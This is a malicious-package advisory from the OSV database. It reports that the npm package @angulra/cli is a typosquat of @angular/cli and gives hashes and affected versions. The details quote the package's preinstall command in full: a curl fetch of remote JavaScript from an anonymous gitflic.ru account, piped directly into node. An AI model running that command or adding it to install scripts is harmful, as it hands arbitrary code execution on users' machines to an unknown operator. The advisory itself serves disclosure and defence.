MAL-2026-17495

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angulra/cli/MAL-2026-17495.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17495
Published
2026-10-04T23:17:56Z
Modified
2026-10-04T23:45:16Z
Summary
Malicious code in @angulra/cli (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e3158beab2ea0d9f8e28d488f124268c8c9a00a3a0f5599823c4d13f741ac40f)

The package name @angulra/cli is a character-swap of @angular/cli and copies the legitimate Angular CLI's metadata (description, repository, homepage, keywords, dependencies). Its package.json defines a preinstall script that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching JavaScript from an anonymous third-party account (hellscripter) on gitflic.ru via a web.archive.org proxy and piping the response directly into Node. The URL is unpinned, has no integrity check, is unrelated to the Angular publisher, and the fetched bytes execute automatically on npm install, giving the operator of that endpoint arbitrary code execution on the installer's machine. src/analytics/analytics-collector.js additionally issues outbound POSTs via https.request alongside ping-style activity.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020908",
            "import_time":  "2026-10-04T23:40:40.859812447Z",
            "modified_time":  "2026-10-04T23:17:56Z",
            "sha256":  "e3158beab2ea0d9f8e28d488f124268c8c9a00a3a0f5599823c4d13f741ac40f",
            "source":  "amazon-inspector",
            "versions":  [
                "22.2.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @angulra/cli

Package

Name
@angulra/cli
View open source insights on deps.dev
Purl
pkg:npm/%40angulra/cli

Affected ranges

Affected versions

22.*
22.2.1

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "package.json",
            "sha256":  "93fc68be8a38359d182dcb8461d07d1e3ee1be5279c86994454ebfa1648c03ec",
            "tlsh":  "22313576dae01d6316d9128498360903743c962b0e06fa78f799540c4f8f69f2277aae"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "cli-22.2.1.tgz",
            "hashes":  {
                "sha1":  "ac4bc353e3455283ccdaa5244c0b42f194a39184",
                "sha512_sri":  "sha512-jHLGtdMxaMiY7mLzplndIna+fojgWUeQM0y8Se9RqAZ2igcChOOG4J80fzLZgsEIqAu3VsOFSqR233fnk2VM9A=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angulra/cli/MAL-2026-17495.json"